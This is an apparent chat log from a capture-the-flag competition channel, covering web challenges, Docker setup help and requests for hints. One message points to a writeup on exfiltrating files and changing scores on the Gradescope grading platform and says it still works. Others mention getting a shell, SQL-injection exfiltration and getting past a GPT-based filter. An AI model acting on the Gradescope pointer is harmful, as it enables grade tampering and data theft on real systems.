it's true that if our own codes are doing funny things in unit tests we have bigger problems

and indeed I'm curious about the homework grading case: I'm not experienced in sandboxing before but from trixter's comment it seems that sandboxing + isolation with unit test modules should be a nice path to go

gradescope, in particular, is notably bad at this - student code just runs in a docker container that you can configure, but the default config does almost zero sandboxing, iirc, so you can exfiltrate any local files or modify your own score

https://www.seas.upenn.edu/~hanbangw/blog/hack-gs/ is a good writeup

3 years old, but still works as of mid last year

Lolllll

That's stupid

LMAO

How long will the web challenge environments maintain?

https://github.com/dicegang/dicectf-2023-challenges

and maybe it can help u

:d

thanks

most likely 1-2 weeks

but challenge deploys have been released so should be the same even after servers go down

impossible-xss is a cool chall, just read the writeup

i tried to use a pdf during the competition, but pdfium seemed too locked down to get away with anything more than sending post requests

omg is that THE garvinator???

you know it

i haven't retired yet 😉

hi! im looking for an intermediate ctf team 🙂

im intermediate level at web. can participate almost every weekend

thanks, i think a few teams tried using pdf (which i didn't consider) but yeah it doesn't allow for much

Someone can tell me why i use /api/ping second ,the node will breakdown ? in web/unfinished

plz

through it ,i can get shell

assuming will breakdown = crash, because the middleware is implemented incorrectly and sends a response that auth failed (but will still proceed running the ping route, which also tries to send a response)

though as the process autorestarts it doesn't really matter (as long as you wait for the process to boot up)

oh,thanks

thanks

Hi admin

How to deploy bot xss from source ?

I want try in my local computer

^

@loud geode might be worth documenting instructions for this ^

but it's just running adminbot.js code in headless chrome with puppeteer, you can npm i puppeteer and run it with a few line changes

yeah I'll update the admin bot repo and document this soon

hope you guys are ready for another 20 nodejs xss challs tomorrow 👀

i have my 0days ready <3

hell yeah

ready to bypass all filter 😄

20 nodejs....

https://tenor.com/view/breaking-bad-walter-white-gif-8086630669522815021

Pwn 🔥 🔥 🔥

🤮

fuck pwn we web!!

web's gonna be webbing

🕷️ 🕸️

Few seconds ...

Rip crash

Wait we're so back

why is the dicegoose challenge 1.5gb ??

we're removing the attachment it isn't needed

its for dicediceotter

🦦

dawg

it's 6 gb for me

💀

as a beginner i really enjoyed dicedicegoose

I dont think this 6gigs is neccesary

But a fun one

I'll kms over this chall

hello please help me to run docker file

https://letmegooglethat.com/?q=how+to+build+a+dockerfile

i build the docker image and run it. it show my that the container is listen on port 8080 but when i try to access the webpage, i got an error

i google yet

i just have trouble to access the webpage

-p 8080:8080

docker run my_image_name -it -p8080:8080

Move the args to after run

yes. i run this ```bash
sudo docker run -it -p 9090:9090 funylogin

you misspelt it

i have this output web/funnylogin listening on port 3000

Replace -p 9090:9090 with 3000:3000

ok

thank you very much !

https://tenor.com/view/terminator-terminator-robot-looking-flex-cool-robot-gif-978532213316794273

More than 80 teams have already passed the funnylogin challenge and I can't figure out how to get the flag despite some pretty classic attempts.
I don't even know how to learn ... I'm giving up this contest, I must be really bad.

Is it possible to perform ssti in ejs latest version

I must be missing something with DDG. I'm able to get the flag printed out but it's not the right flag. Is the hint staring me right in the face?

skill issue bobi

I'm pretty sure a score over 100 is good, sooooooo shrug

uggghhhh got it.... Such a silly goose that goose was

that challenge was kinda silly lmao

I was trying to use arrow keys 💀

LOL I was trying the same thing HAHA

same 😂

Dude I swear the SQL is not the vulnerable part

The admin decider doesn't change any sql

So how do I know bro

😭

how can I access to docker web environment?

Don't worry, I got it

but i cant get it

why the flag generator on goose doesnt work. it is encrypted to whaaaat

dicedicegooseeeeeeeeeeeeee

Then you must not be a beginner! I'm just starting out and I'm not getting anywhere despite my not-ridiculous knowledge.

who solved dicedicegoose

admin of funyylogin

create a ticket please

How does dicedicegoose have more solves than gpwaf lol 😭

It's not that bad

Всем привет 😀

funny login down ...

@grave coral

#general

oh you are right.. funnylogic down

we need hints for these challenges😭

ci is spinning

helps some hints on funnylogic or crypto/winter please?

we are not providing hints to challenges with many solves, sorry

Hey, I am totally newb. I am doing this after more than 6 months so I am totally blank. Any help I could get at all?

Literally, I have no idea. I am doing web currently. Tried alot of different approaches but got nothing in any challenge.

Здарова)

как успехи ?

дарова

чет жестко по-моему

вы сделали веб самое первое?

очень плохо

я первый раз на ctf

0 заданий

нет, а ты?

неа

калькулятор или логин сделали ?

вообще ничего

чет разобраться даже не можем

Omg, this gpwaf task is really good

Like, its fun

And easy, if you know, what you need to do

gpts are dumb, 4sure

sqli data exfiltration with sqlite3 or ..... ?

same

: C

einh?

difficulty? still solveable?

Surely, I'd say it is on the easy side

is there some specific set of moves?

nice, I'll try to look at that. After finish scriptingo on funnylogic. I'm stuck at crypto

I am not sure you need a script for funnylogic, cause I presume you want to bruteforce it, which is not allowed.

you don't

Yeah, I also dont think so

hmm.. I think I know what you meant..

I meant only that

Idk what for a script you possibly can write here, so I just presumed.

шо ты

в тиму примешь?

да я типо уже в тиме

кидай приглос

so you mean that i can get the flag without bruteforce right ?

That is the premise of a challenge

yeah ik

do you need tools or just plain logic will do?

I dont think you need tools to solve any of the web chals

funnylogin is irritating for me 😬